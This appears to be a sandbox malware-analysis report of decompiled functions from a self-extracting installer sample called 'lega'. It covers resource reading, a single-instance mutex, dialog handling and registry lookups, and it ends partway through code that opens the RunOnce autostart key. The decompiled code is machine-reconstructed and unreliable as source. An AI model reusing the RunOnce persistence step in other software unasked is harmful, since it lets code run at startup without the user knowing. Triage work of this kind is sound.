                                                				void* __esi;
                                                				signed int _t13;
                                                				void* _t20;
                                                				void* _t23;
                                                				void* _t27;
                                                				struct HRSRC__* _t31;
                                                				intOrPtr _t33;
                                                				void* _t43;
                                                				void* _t48;
                                                				signed int _t65;
                                                				struct HINSTANCE__* _t66;
                                                				signed int _t67;
                                                
                                                				_t13 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t13 ^ _t67;
                                                				_t65 = 0;
                                                				_t66 = __ecx;
                                                				_t48 = __edx;
                                                				 *0x389a3c = __ecx;
                                                				memset(0x389140, 0, 0x8fc);
                                                				memset(0x388a20, 0, 0x32c);
                                                				memset(0x3888c0, 0, 0x104);
                                                				 *0x3893ec = 1;
                                                				_t20 = E0038468F("TITLE", 0x389154, 0x7f);
                                                				if(_t20 == 0 || _t20 > 0x80) {
                                                					_t64 = 0x4b1;
                                                					goto L32;
                                                				} else {
                                                					_t27 = CreateEventA(0, 1, 1, 0);
                                                					 *0x38858c = _t27;
                                                					SetEvent(_t27);
                                                					_t64 = 0x389a34;
                                                					if(E0038468F("EXTRACTOPT", 0x389a34, 4) != 0) {
                                                						if(( *0x389a34 & 0x000000c0) == 0) {
                                                							L12:
                                                							 *0x389120 =  *0x389120 & _t65;
                                                							if(E00385C9E(_t48, _t48, _t65, _t66) != 0) {
                                                								if( *0x388a3a == 0) {
                                                									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                									if(_t31 != 0) {
                                                										_t65 = LoadResource(_t66, _t31);
                                                									}
                                                									if( *0x388184 != 0) {
                                                										__imp__#17();
                                                									}
                                                									if( *0x388a24 == 0) {
                                                										_t57 = _t65;
                                                										if(E003836EE(_t65) == 0) {
                                                											goto L33;
                                                										} else {
                                                											_t33 =  *0x389a40; // 0x3
                                                											_t48 = 1;
                                                											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                												if(( *0x389a34 & 0x00000100) == 0 || ( *0x388a38 & 0x00000001) != 0 || E003818A3(_t64, _t66) != 0) {
                                                													goto L30;
                                                												} else {
                                                													_t64 = 0x7d6;
                                                													if(E00386517(_t57, 0x7d6, _t34, E003819E0, 0x547, 0x83e) != 0x83d) {
                                                														goto L33;
                                                													} else {
                                                														goto L30;
                                                													}
                                                												}
                                                											} else {
                                                												L30:
                                                												_t23 = _t48;
                                                											}
                                                										}
                                                									} else {
                                                										_t23 = 1;
                                                									}
                                                								} else {
                                                									E00382390(0x388a3a);
                                                									goto L33;
                                                								}
                                                							} else {
                                                								_t64 = 0x520;
                                                								L32:
                                                								E003844B9(0, _t64, 0, 0, 0x10, 0);
                                                								goto L33;
                                                							}
                                                						} else {
                                                							_t64 =  &_v268;
                                                							if(E0038468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                								goto L3;
                                                							} else {
                                                								_t43 = CreateMutexA(0, 1,  &_v268);
                                                								 *0x388588 = _t43;
                                                								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                									goto L12;
                                                								} else {
                                                									if(( *0x389a34 & 0x00000080) == 0) {
                                                										_t64 = 0x524;
                                                										if(E003844B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                											goto L12;
                                                										} else {
                                                											goto L11;
                                                										}
                                                									} else {
                                                										_t64 = 0x54b;
                                                										E003844B9(0, 0x54b, "lega", 0, 0x10, 0);
                                                										L11:
                                                										CloseHandle( *0x388588);
                                                										 *0x389124 = 0x800700b7;
                                                										goto L33;
                                                									}
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						L3:
                                                						_t64 = 0x4b1;
                                                						E003844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                						 *0x389124 = 0x80070714;
                                                						L33:
                                                						_t23 = 0;
                                                					}
                                                				}
                                                				return E00386CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                			}



















                                                0x00382cb5
                                                0x00382cbc
                                                0x00382cc7
                                                0x00382cc9
                                                0x00382cd1
                                                0x00382cd3
                                                0x00382cd9
                                                0x00382ce9
                                                0x00382cf9
                                                0x00382d0e
                                                0x00382d15
                                                0x00382d1c
                                                0x00382ef3
                                                0x00000000
                                                0x00382d2d
                                                0x00382d34
                                                0x00382d3b
                                                0x00382d40
                                                0x00382d48
                                                0x00382d59
                                                0x00382d84
                                                0x00382e1f
                                                0x00382e1f
                                                0x00382e2e
                                                0x00382e41
                                                0x00382e5a
                                                0x00382e62
                                                0x00382e6c
                                                0x00382e6c
                                                0x00382e75
                                                0x00382e77
                                                0x00382e77
                                                0x00382e84
                                                0x00382e8b
                                                0x00382e94
                                                0x00000000
                                                0x00382e96
                                                0x00382e96
                                                0x00382e9e
                                                0x00382ea2
                                                0x00382eba
                                                0x00000000
                                                0x00382ece
                                                0x00382ede
                                                0x00382eed
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00382eed
                                                0x00382eef
                                                0x00382eef
                                                0x00382eef
                                                0x00382eef
                                                0x00382ea2
                                                0x00382e86
                                                0x00382e88
                                                0x00382e88
                                                0x00382e43
                                                0x00382e48
                                                0x00000000
                                                0x00382e48
                                                0x00382e30
                                                0x00382e30
                                                0x00382ef8
                                                0x00382f01
                                                0x00000000
                                                0x00382f01
                                                0x00382d8a
                                                0x00382d8f
                                                0x00382da1
                                                0x00000000
                                                0x00382da3
                                                0x00382dae
                                                0x00382db4
                                                0x00382dbb
                                                0x00000000
                                                0x00382dca
                                                0x00382dd3
                                                0x00382df5
                                                0x00382e02
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00382dd5
                                                0x00382dde
                                                0x00382de3
                                                0x00382e04
                                                0x00382e0a
                                                0x00382e10
                                                0x00000000
                                                0x00382e10
                                                0x00382dd3
                                                0x00382dbb
                                                0x00382da1
                                                0x00382d5b
                                                0x00382d5b
                                                0x00382d5d
                                                0x00382d69
                                                0x00382d6e
                                                0x00382f06
                                                0x00382f06
                                                0x00382f06
                                                0x00382d59
                                                0x00382f18

                                                APIs
                                                • memset.MSVCRT ref: 00382CD9
                                                • memset.MSVCRT ref: 00382CE9
                                                • memset.MSVCRT ref: 00382CF9
                                                  • Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846A0
                                                  • Part of subcall function 0038468F: SizeofResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846A9
                                                  • Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846C3
                                                  • Part of subcall function 0038468F: LoadResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846CC
                                                  • Part of subcall function 0038468F: LockResource.KERNEL32(00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846D3
                                                  • Part of subcall function 0038468F: memcpy_s.MSVCRT ref: 003846E5
                                                  • Part of subcall function 0038468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003846EF
                                                • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00382D34
                                                • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00382D40
                                                • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00382DAE
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00382DBD
                                                • CloseHandle.KERNEL32(lega,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00382E0A
                                                  • Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
                                                  • Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lega
                                                • API String ID: 1002816675-2051202908
                                                • Opcode ID: 87b12e20ad9bd03cf078919cb7a7580653dc0cb3f9cef7e909436f954e8033a1
                                                • Instruction ID: f92267403ca52eb64a172993e9dc6465873820912380e357000c280c2cf7390c
                                                • Opcode Fuzzy Hash: 87b12e20ad9bd03cf078919cb7a7580653dc0cb3f9cef7e909436f954e8033a1
                                                • Instruction Fuzzy Hash: 1B512670340301ABEB27BB708C4AB7B369DEB85700F5444EAFA42DA5D1EBB89C41C725
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 81%
                                                			E003834F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                				void* _t9;
                                                				void* _t12;
                                                				void* _t13;
                                                				void* _t17;
                                                				void* _t23;
                                                				void* _t25;
                                                				struct HWND__* _t35;
                                                				struct HWND__* _t38;
                                                				void* _t39;
                                                
                                                				_t9 = _a8 - 0x10;
                                                				if(_t9 == 0) {
                                                					__eflags = 1;
                                                					L19:
                                                					_push(0);
                                                					 *0x3891d8 = 1;
                                                					L20:
                                                					_push(_a4);
                                                					L21:
                                                					EndDialog();
                                                					L22:
                                                					return 1;
                                                				}
                                                				_push(1);
                                                				_pop(1);
                                                				_t12 = _t9 - 0xf2;
                                                				if(_t12 == 0) {
                                                					__eflags = _a12 - 0x1b;
                                                					if(_a12 != 0x1b) {
                                                						goto L22;
                                                					}
                                                					goto L19;
                                                				}
                                                				_t13 = _t12 - 0xe;
                                                				if(_t13 == 0) {
                                                					_t35 = _a4;
                                                					 *0x388584 = _t35;
                                                					E003843D0(_t35, GetDesktopWindow());
                                                					__eflags =  *0x388184; // 0x1
                                                					if(__eflags != 0) {
                                                						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                					}
                                                					SetWindowTextA(_t35, "lega");
                                                					_t17 = CreateThread(0, 0, E00384FE0, 0, 0, 0x388798);
                                                					 *0x38879c = _t17;
                                                					__eflags = _t17;
                                                					if(_t17 != 0) {
                                                						goto L22;
                                                					} else {
                                                						E003844B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                						_push(0);
                                                						_push(_t35);
                                                						goto L21;
                                                					}
                                                				}
                                                				_t23 = _t13 - 1;
                                                				if(_t23 == 0) {
                                                					__eflags = _a12 - 2;
                                                					if(_a12 != 2) {
                                                						goto L22;
                                                					}
                                                					ResetEvent( *0x38858c);
                                                					_t38 =  *0x388584; // 0x0
                                                					_t25 = E003844B9(_t38, 0x4b2, 0x381140, 0, 0x20, 4);
                                                					__eflags = _t25 - 6;
                                                					if(_t25 == 6) {
                                                						L11:
                                                						 *0x3891d8 = 1;
                                                						SetEvent( *0x38858c);
                                                						_t39 =  *0x38879c; // 0x0
                                                						E00383680(_t39);
                                                						_push(0);
                                                						goto L20;
                                                					}
                                                					__eflags = _t25 - 1;
                                                					if(_t25 == 1) {
                                                						goto L11;
                                                					}
                                                					SetEvent( *0x38858c);
                                                					goto L22;
                                                				}
                                                				if(_t23 == 0xe90) {
                                                					TerminateThread( *0x38879c, 0);
                                                					EndDialog(_a4, _a12);
                                                					return 1;
                                                				}
                                                				return 0;
                                                			}












                                                0x003834fb
                                                0x003834fe
                                                0x00383665
                                                0x00383666
                                                0x00383666
                                                0x00383668
                                                0x0038366e
                                                0x0038366e
                                                0x00383671
                                                0x00383671
                                                0x00383677
                                                0x00000000
                                                0x00383677
                                                0x00383504
                                                0x00383506
                                                0x00383507
                                                0x0038350c
                                                0x0038365b
                                                0x0038365f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00383661
                                                0x00383512
                                                0x00383515
                                                0x003835be
                                                0x003835c1
                                                0x003835d1
                                                0x003835d8
                                                0x003835de
                                                0x003835f8
                                                0x00383617
                                                0x00383617
                                                0x00383623
                                                0x00383637
                                                0x0038363d
                                                0x00383642
                                                0x00383644
                                                0x00000000
                                                0x00383646
                                                0x00383652
                                                0x00383657
                                                0x00383658
                                                0x00000000
                                                0x00383658
                                                0x00383644
                                                0x0038351b
                                                0x0038351d
                                                0x0038354f
                                                0x00383553
                                                0x00000000
                                                0x00000000
                                                0x0038355f
                                                0x00383565
                                                0x0038357c
                                                0x00383581
                                                0x00383584
                                                0x0038359b
                                                0x003835a1
                                                0x003835a7
                                                0x003835ad
                                                0x003835b3
                                                0x003835b8
                                                0x00000000
                                                0x003835b8
                                                0x00383586
                                                0x00383588
                                                0x00000000
                                                0x00000000
                                                0x00383590
                                                0x00000000
                                                0x00383590
                                                0x00383524
                                                0x00383535
                                                0x00383541
                                                0x00000000
                                                0x00383549
                                                0x00000000

                                                APIs
                                                • TerminateThread.KERNEL32(00000000), ref: 00383535
                                                • EndDialog.USER32(?,?), ref: 00383541
                                                • ResetEvent.KERNEL32 ref: 0038355F
                                                • SetEvent.KERNEL32(00381140,00000000,00000020,00000004), ref: 00383590
                                                • GetDesktopWindow.USER32 ref: 003835C7
                                                • GetDlgItem.USER32(?,0000083B), ref: 003835F1
                                                • SendMessageA.USER32(00000000), ref: 003835F8
                                                • GetDlgItem.USER32(?,0000083B), ref: 00383610
                                                • SendMessageA.USER32(00000000), ref: 00383617
                                                • SetWindowTextA.USER32(?,lega), ref: 00383623
                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,00388798), ref: 00383637
                                                • EndDialog.USER32(?,00000000), ref: 00383671
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                • String ID: lega
                                                • API String ID: 2406144884-245445314
                                                • Opcode ID: b3f89f45dc399bb88a81f4bc90046f3e0fecec27fded8aefa776a484f058c3b9
                                                • Instruction ID: 013eaf4ab63572d437a1c66fc9a8b77852608a476c5ec6bd8aeee738abe4dd92
                                                • Opcode Fuzzy Hash: b3f89f45dc399bb88a81f4bc90046f3e0fecec27fded8aefa776a484f058c3b9
                                                • Instruction Fuzzy Hash: 1631B330240301BBEB237F29EC8DE2B3A6CE786F11F5449DAF602953A0DB758A00DB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 50%
                                                			E00384224(char __ecx) {
                                                				char* _v8;
                                                				_Unknown_base(*)()* _v12;
                                                				_Unknown_base(*)()* _v16;
                                                				_Unknown_base(*)()* _v20;
                                                				char* _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				char _v44;
                                                				char _v48;
                                                				char _v52;
                                                				_Unknown_base(*)()* _t26;
                                                				_Unknown_base(*)()* _t28;
                                                				_Unknown_base(*)()* _t29;
                                                				_Unknown_base(*)()* _t32;
                                                				char _t42;
                                                				char* _t44;
                                                				char* _t61;
                                                				void* _t63;
                                                				char* _t65;
                                                				struct HINSTANCE__* _t66;
                                                				char _t67;
                                                				void* _t71;
                                                				char _t76;
                                                				intOrPtr _t85;
                                                
                                                				_t67 = __ecx;
                                                				_t66 = LoadLibraryA("SHELL32.DLL");
                                                				if(_t66 == 0) {
                                                					_t63 = 0x4c2;
                                                					L22:
                                                					E003844B9(_t67, _t63, 0, 0, 0x10, 0);
                                                					return 0;
                                                				}
                                                				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                				_v12 = _t26;
                                                				if(_t26 == 0) {
                                                					L20:
                                                					FreeLibrary(_t66);
                                                					_t63 = 0x4c1;
                                                					goto L22;
                                                				}
                                                				_t28 = GetProcAddress(_t66, 0xc3);
                                                				_v20 = _t28;
                                                				if(_t28 == 0) {
                                                					goto L20;
                                                				}
                                                				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                				_v16 = _t29;
                                                				if(_t29 == 0) {
                                                					goto L20;
                                                				}
                                                				_t76 =  *0x3888c0; // 0x0
                                                				if(_t76 != 0) {
                                                					L10:
                                                					 *0x3887a0 = 0;
                                                					_v52 = _t67;
                                                					_v48 = 0;
                                                					_v44 = 0;
                                                					_v40 = 0x388598;
                                                					_v36 = 1;
                                                					_v32 = E00384200;
                                                					_v28 = 0x3888c0;
                                                					 *0x38a288( &_v52);
                                                					_t32 =  *_v12();
                                                					if(_t71 != _t71) {
                                                						asm("int 0x29");
                                                					}
                                                					_v12 = _t32;
                                                					if(_t32 != 0) {
                                                						 *0x38a288(_t32, 0x3888c0);
                                                						 *_v16();
                                                						if(_t71 != _t71) {
                                                							asm("int 0x29");
                                                						}
                                                						if( *0x3888c0 != 0) {
                                                							E00381680(0x3887a0, 0x104, 0x3888c0);
                                                						}
                                                						 *0x38a288(_v12);
                                                						 *_v20();
                                                						if(_t71 != _t71) {
                                                							asm("int 0x29");
                                                						}
                                                					}
                                                					FreeLibrary(_t66);
                                                					_t85 =  *0x3887a0; // 0x0
                                                					return 0 | _t85 != 0x00000000;
                                                				} else {
                                                					GetTempPathA(0x104, 0x3888c0);
                                                					_t61 = 0x3888c0;
                                                					_t4 =  &(_t61[1]); // 0x3888c1
                                                					_t65 = _t4;
                                                					do {
                                                						_t42 =  *_t61;
                                                						_t61 =  &(_t61[1]);
                                                					} while (_t42 != 0);
                                                					_t5 = _t61 - _t65 + 0x3888c0; // 0x711181
                                                					_t44 = CharPrevA(0x3888c0, _t5);
                                                					_v8 = _t44;
                                                					if( *_t44 == 0x5c &&  *(CharPrevA(0x3888c0, _t44)) != 0x3a) {
                                                						 *_v8 = 0;
                                                					}
                                                					goto L10;
                                                				}
                                                			}




























                                                0x00384234
                                                0x0038423c
                                                0x00384240
                                                0x003843b2
                                                0x003843b7
                                                0x003843c0
                                                0x00000000
                                                0x003843c5
                                                0x0038424c
                                                0x00384252
                                                0x00384257
                                                0x003843a4
                                                0x003843a5
                                                0x003843ab
                                                0x00000000
                                                0x003843ab
                                                0x00384263
                                                0x00384269
                                                0x0038426e
                                                0x00000000
                                                0x00000000
                                                0x0038427a
                                                0x00384280
                                                0x00384285
                                                0x00000000
                                                0x00000000
                                                0x0038428d
                                                0x00384293
                                                0x003842e6
                                                0x003842e9
                                                0x003842ef
                                                0x003842f4
                                                0x003842f7
                                                0x00384300
                                                0x00384307
                                                0x0038430e
                                                0x00384315
                                                0x0038431c
                                                0x00384322
                                                0x00384326
                                                0x0038432d
                                                0x0038432d
                                                0x0038432f
                                                0x00384334
                                                0x00384343
                                                0x00384349
                                                0x0038434d
                                                0x00384354
                                                0x00384354
                                                0x0038435d
                                                0x0038436e
                                                0x0038436e
                                                0x0038437d
                                                0x00384383
                                                0x00384387
                                                0x0038438e
                                                0x0038438e
                                                0x00384387
                                                0x00384391
                                                0x00384399
                                                0x00000000
                                                0x00384295
                                                0x0038429f
                                                0x003842a5
                                                0x003842aa
                                                0x003842aa
                                                0x003842ad
                                                0x003842ad
                                                0x003842af
                                                0x003842b0
                                                0x003842b6
                                                0x003842c2
                                                0x003842c8
                                                0x003842ce
                                                0x003842e4
                                                0x003842e4
                                                0x00000000
                                                0x003842ce

                                                APIs
                                                • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00384236
                                                • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0038424C
                                                • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00384263
                                                • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0038427A
                                                • GetTempPathA.KERNEL32(00000104,003888C0,?,00000001), ref: 0038429F
                                                • CharPrevA.USER32(003888C0,00711181,?,00000001), ref: 003842C2
                                                • CharPrevA.USER32(003888C0,00000000,?,00000001), ref: 003842D6
                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00384391
                                                • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 003843A5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                • API String ID: 1865808269-1731843650
                                                • Opcode ID: 270d83a19019c43ea74e3fb2719021d4163eab9281430bea1114f7297d709241
                                                • Instruction ID: 6bbb2d49e45f467b061fc4afb202139b97448f8d7dbf36d282d90bca30588ca6
                                                • Opcode Fuzzy Hash: 270d83a19019c43ea74e3fb2719021d4163eab9281430bea1114f7297d709241
                                                • Instruction Fuzzy Hash: 4C411A78A00305AFE713BF74DC88AAE7BB9EB49344F9505EAE941A7251CF758C01C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E00382773(CHAR* __ecx, char* _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v269;
                                                				CHAR* _v276;
                                                				int _v280;
                                                				void* _v284;
                                                				int _v288;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t23;
                                                				intOrPtr _t34;
                                                				int _t45;
                                                				int* _t50;
                                                				CHAR* _t52;
                                                				CHAR* _t61;
                                                				char* _t62;
                                                				int _t63;
                                                				CHAR* _t64;
                                                				signed int _t65;
                                                
                                                				_t52 = __ecx;
                                                				_t23 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t23 ^ _t65;
                                                				_t62 = _a4;
                                                				_t50 = 0;
                                                				_t61 = __ecx;
                                                				_v276 = _t62;
                                                				 *((char*)(__ecx)) = 0;
                                                				if( *_t62 != 0x23) {
                                                					_t63 = 0x104;
                                                					goto L14;
                                                				} else {
                                                					_t64 = _t62 + 1;
                                                					_v269 = CharUpperA( *_t64);
                                                					_v276 = CharNextA(CharNextA(_t64));
                                                					_t63 = 0x104;
                                                					_t34 = _v269;
                                                					if(_t34 == 0x53) {
                                                						L14:
                                                						GetSystemDirectoryA(_t61, _t63);
                                                						goto L15;
                                                					} else {
                                                						if(_t34 == 0x57) {
                                                							GetWindowsDirectoryA(_t61, 0x104);
                                                							goto L16;
                                                						} else {
                                                							_push(_t52);
                                                							_v288 = 0x104;
                                                							E00381781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                							_t59 = 0x104;
                                                							E0038658A( &_v268, 0x104, _v276);
                                                							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                								L16:
                                                								_t59 = _t63;
                                                								E0038658A(_t61, _t63, _v276);
                                                							} else {
                                                								if(RegQueryValueExA(_v284, 0x381140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                									_t45 = _v280;
                                                									if(_t45 != 2) {
                                                										L9:
                                                										if(_t45 == 1) {
                                                											goto L10;
                                                										}
                                                									} else {
                                                										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                											_t45 = _v280;
                                                											goto L9;
                                                										} else {
                                                											_t59 = 0x104;
                                                											E00381680(_t61, 0x104,  &_v268);
                                                											L10:
                                                											_t50 = 1;
                                                										}
                                                									}
                                                								}
                                                								RegCloseKey(_v284);
                                                								L15:
                                                								if(_t50 == 0) {
                                                									goto L16;
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				return E00386CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                			}























                                                0x00382773
                                                0x0038277e
                                                0x00382785
                                                0x0038278a
                                                0x0038278d
                                                0x00382790
                                                0x00382792
                                                0x00382798
                                                0x0038279d
                                                0x003828b2
                                                0x00000000
                                                0x003827a3
                                                0x003827a3
                                                0x003827af
                                                0x003827c2
                                                0x003827c8
                                                0x003827cd
                                                0x003827d5
                                                0x003828b7
                                                0x003828b9
                                                0x00000000
                                                0x003827db
                                                0x003827dd
                                                0x003828aa
                                                0x00000000
                                                0x003827e3
                                                0x003827e3
                                                0x003827ec
                                                0x003827f8
                                                0x00382803
                                                0x0038280b
                                                0x00382831
                                                0x003828c3
                                                0x003828c9
                                                0x003828cd
                                                0x00382837
                                                0x0038285a
                                                0x0038285c
                                                0x00382865
                                                0x00382892
                                                0x00382895
                                                0x00000000
                                                0x00000000
                                                0x00382867
                                                0x00382878
                                                0x0038288c
                                                0x00000000
                                                0x0038287a
                                                0x00382880
                                                0x00382885
                                                0x00382897
                                                0x00382899
                                                0x00382899
                                                0x00382878
                                                0x00382865
                                                0x003828a0
                                                0x003828bf
                                                0x003828c1
                                                0x00000000
                                                0x00000000
                                                0x003828c1
                                                0x00382831
                                                0x003827dd
                                                0x003827d5
                                                0x003828e5

                                                APIs
                                                • CharUpperA.USER32(B25159A8,00000000,00000000,00000000), ref: 003827A8
                                                • CharNextA.USER32(0000054D), ref: 003827B5
                                                • CharNextA.USER32(00000000), ref: 003827BC
                                                • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00382829
                                                • RegQueryValueExA.ADVAPI32(?,00381140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00382852
                                                • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00382870
                                                • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003828A0
                                                • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 003828AA
                                                • GetSystemDirectoryA.KERNEL32 ref: 003828B9
                                                Strings
                                                • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 003827E4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                • API String ID: 2659952014-2428544900
                                                • Opcode ID: ff7bd3184a40004c6bef5fbb2843e9f5361454fc668bb55525d72022ff239076
                                                • Instruction ID: 0201a409ccbbbe039e68f18ff176da5bcb765e4f872d5cdb6c71a4f8a814f22e
                                                • Opcode Fuzzy Hash: ff7bd3184a40004c6bef5fbb2843e9f5361454fc668bb55525d72022ff239076
                                                • Instruction Fuzzy Hash: F44175B190032CAFDF26AB649C45AEB77BDEB55700F1440EAF545D2110DB708E869FA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 62%
                                                			E00382267() {
                                                				signed int _v8;
                                                				char _v268;
                                                				char _v836;
                                                				void* _v840;
                                                				int _v844;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t19;
                                                				intOrPtr _t33;
                                                				void* _t38;
                                                				intOrPtr* _t42;
                                                				void* _t45;
                                                				void* _t47;
                                                				void* _t49;
                                                				signed int _t51;
                                                
                                                				_t19 =  *0x388004; // 0xb25159a8
                                                				_t20 = _t19 ^ _t51;
                                                				_v8 = _t19 ^ _t51;
                                                				if( *0x388530 != 0) {
                                                					_push(_t49);
                                                					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                						_push(_t38);
                                                						_v844 = 0x238;
